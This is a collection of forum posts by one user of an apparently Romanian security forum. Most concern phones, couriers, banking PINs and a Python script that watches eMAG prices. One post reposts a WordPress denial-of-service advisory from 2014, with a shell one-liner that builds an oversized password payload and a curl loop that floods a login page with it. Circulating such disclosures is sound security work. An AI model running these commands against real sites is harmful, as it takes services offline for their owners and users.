
Everything posted by LLegoLLaS

  1. The title should be changed too; it's a tool specific to a certain model. Other manufacturers, through their firmware modifications, sometimes fix these bugs, and those phones can be rooted only with vulnerabilities in their respective firmware. Advice: don't try that tool on phones other than Huawei.
  2. That's the one! I took the liberty of modifying it for sleed. Thanks
  3. TAXz good... and... the connection between biology and online security?
  4. The QR code expires in about a minute and you have to generate another one. Also: !!! WhatsApp Web works only while the phone is connected to the internet; once you've disconnected your phone from the internet you can no longer send/receive messages on the web. So it becomes a bit safer... but less useful.
  5. This is so you don't say I have something against you.
  6. The thing with a 5-digit password on a bank account is idiotic (I have a more complicated password on torrent sites), but... what's wrong with the Digipass? Even if the Digipass has a 4-digit password (a PIN that you set yourself), it locks if you enter the password wrong (3?) times. It seems OK to me.
  7. Return it by courier to the shop you bought it from. Send a PM for details.
  8. Something like cell broadcast, I suppose. The way in some areas (it happened to me in Serbia) it tells you which town you're in. Only within a much smaller perimeter.
  9. It's actually that Flexi bonus, right? Depending on how much you top up, you can also get a bonus with MB of traffic.
  10. "Brought", read: stolen. We don't encourage that here on the forum.
  11. +1. Thanks. The mega link doesn't work anymore either.
  12. Is there a courier in our country that transports animals?
  13. ====================================================================
      DESCRIPTION:
      ====================================================================

      A vulnerability present in Wordpress < 4.0.1 allows an attacker to send specially crafted requests resulting in CPU and memory exhaustion. This may lead to the site becoming unavailable or unresponsive (denial of service).

      ====================================================================
      Time Line:
      ====================================================================

      November 20, 2014 - A Wordpress security update and the security advisory is published.

      ====================================================================
      Proof of Concept:
      ====================================================================

      Generate a payload and try with a valid user:

          echo -n "name=admin&pass=" > valid_user_payload && printf "%s" {1..1000000} >> valid_user_payload && echo -n "&op=Log in&form_id=user_login" >> valid_user_payload

      Perform a DoS with a valid user:

          for i in `seq 1 150`; do (curl --data @valid_user_payload http://yoursite/wordpress/?q=user --silent > /dev/null &); sleep 0.5; done

      ====================================================================
      Authors:
      ====================================================================

      -- Javer Nieto -- Hacking while you're asleep (http://www.behindthefirewalls.com)
      -- Andres Rojas -- # /dev/console | "In the beginning … Was the command line" (Neal Stephenson) (http://www.devconsole.info)

      ====================================================================
      References:
      ====================================================================

      * https://wordpress.org/news/2014/11/wordpress-4-0-1/
      * https://www.drupal.org/SA-CORE-2014-006
      * Wordpress Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleep: http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html
      * Drupal Denial of Service Responsible Disclosure - Attacking with long passwords ~ Hacking while you're asleep: http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html
      * Timing Attack and the importance of controlling the length of the input – The Case of Drupal CVE-2014-9016. | # /dev/console: http://www.devconsole.info/?p=1050

      Source: bugsearch.net
  14.
      #!/usr/bin/env python
      # Python 2 script (uses urllib2 and print statements).
      import smtplib
      import urllib2
      import random
      import re
      import time

      # configuration panel
      email = " "  # where you want to receive the offers
      smtp = "smtp.gmail.com"
      loginuser = "@gmail.com"
      loginpass = ""
      chilipir = 25  # price (RON) below which you are notified
      interval_timp_cautare = 600  # in seconds

      print r"""
      #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#\
      #.........RSTforums.com........#-\
      #.............Usr6.............#--\/
      #...Cautatoru de chilipiruri 1.2...#--/\
      #..............................#-/
      #@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@#/
      """

      def email_sender(TEXT):
          # Send TEXT to the configured address over SMTP with STARTTLS.
          #print TEXT
          message = 'To:' + email + '\n' + 'From: ' + loginuser + '\n' + 'Subject:Chilipir \n\n' + TEXT
          server = smtplib.SMTP(smtp, 587)
          server.ehlo()
          server.starttls()
          server.login(loginuser, loginpass)
          server.sendmail(loginuser, email, message)
          server.quit()
          print "Oferta a fost expediata"
          return

      expediate = []  # offers already sent, so each one is mailed only once
      while True:
          expediat = ""
          random_nr = str(random.randint(10**16,99999999999999999))
          # build a randomized Opera User-Agent string from the digits of random_nr
          ua = "Opera/%s.%s (Windows NT %s.%s) Presto/%s.%s.%s Version/%s.%s" \
              %(random_nr[0], random_nr[1:3], random_nr[4], random_nr[5], random_nr[6], random_nr[7:9], random_nr[10:13], random_nr[13:15], random_nr[15:17])
          try:
              site = "http://www.emag.ro/resigilate/sort-priceasc"
              req = urllib2.Request(site, None, {'User-Agent' : ua})
              continut = urllib2.urlopen(req, timeout=30).read()
              # capture (price, link) pairs from the listing markup
              match = re.findall('\"money-int\"\>(\d*)\<\/span\>\<sup class=\"money-decimal\"\>\d*.+\n.+\t+.+\n\t.+\n.+\n.+\<a href=\"(.+#resigilate)"',continut)
              for every in match:
                  pret, link = every
                  if int(pret) <= chilipir:
                      link = "http://www.emag.ro" + link
                      unic = str(pret) + link
                      if unic not in expediate:
                          expediat += str(pret) + "\t" + link +"\n"
                          expediate.append(unic)
          except Exception as E:
              # str() is required: concatenating the exception object to the message raises TypeError
              email_sender(str(E))
          if len(expediat) >= 1:
              email_sender(expediat)
          time.sleep(interval_timp_cautare)
          print time.strftime("%c"), "nimic nou"
      exit()

      Adapted to work with a Gmail account. Later edit: if it's a new account, it may not work the first time (it blocks the login as not being secure) and you may get an email with Enable less Secure Access. Once you tick that, it works.
  15. I'm tempted by game 37. Thanks for the idea.
  16. Update the firmware on the HTC, replace the SIM at Vodafone (free or 10-20 lei).
  17. The read head probably fucked up your platter/platters. Warranty, and swear up and down that you didn't drop it on the floor.
  18. Post this news here: www. c r e s t i n o r t od o x .ro/ forum/ ))
  19. Maybe the display and the case tomorrow, since the RAM is soldered to the board. On topic: yes, it's practically a different phone. Edit: stop messing around with stolen phones.
  20. Because probably nobody has ported it to the 4X HD. From what I know it's based on Nvidia Tegra, so it's harder. @vHacker see XDA Developers; there you'll find lots of ROMs and mods for your phone.
  21. The so-called darknet, which is accessible via the anonymizing Tor network, has a reputation for being home to many disreputable sites. But now the biggest social network in the world is available via Tor.

      Facebook announced Friday that it is available to Tor users via a .onion address--the pseudo-top-level-domain used by Tor hidden services. Anyone wishing to connect to Facebook via Tor can do so by typing https://facebookcorewwwi.onion/ into their web browser when connected to Tor (it won't work otherwise).

      Facebook says Tor users who visit the social network's .onion site are protected with end-to-end encryption since the .onion site connects directly to a Facebook data center via SSL.

      Facebook's new .onion site makes it easier for users to connect to the social network via Tor without running into problems. Facebook's security systems, for example, may flag a Tor-connecting account for being hacked. Like a hacked account, Tor user traffic can appear to be coming from several different countries in a short period of time.

      Why this matters: Facebook's very nature as a social network where anonymity is shunned may seem a strange candidate for creating a Tor site. But there are many reasons to connect to Facebook as securely as possible without revealing your location despite the loss of anonymity on Facebook itself. Participants in the 2011 protests against the Mubarak regime in Egypt, for example, used Facebook to mobilize protesters and inform the public.

      A first for SSL

      Facebook's SSL connection via Tor is also a first for the world of .onion sites. The social network's Tor hidden service is the first .onion address to receive a legitimate SSL certificate from an issuing certificate authority, according to a tweet from Runa Sandvik, who contributes to the Tor Project.

      An SSL certificate is used by your browser to verify that you are connecting to the site you think you are. Facebook says it wanted to use an SSL certificate that cites its .onion address to give users confidence that they were indeed connecting to Facebook and not a malicious imitation.

      Source: PCWorld

      What the crap else do they want?
  22. I also returned a processor by courier without the cooler it came with. They didn't complain (but it was in its box).
  23. I voted yes for the reasons you gave above. But if I think about it more carefully, RST is an IT security forum. One of the fundamental ideas of online security is anonymity. Afterwards I'll be hearing from you with topics like "My mom found a turd in the mailbox along with a threatening note. What can I do?"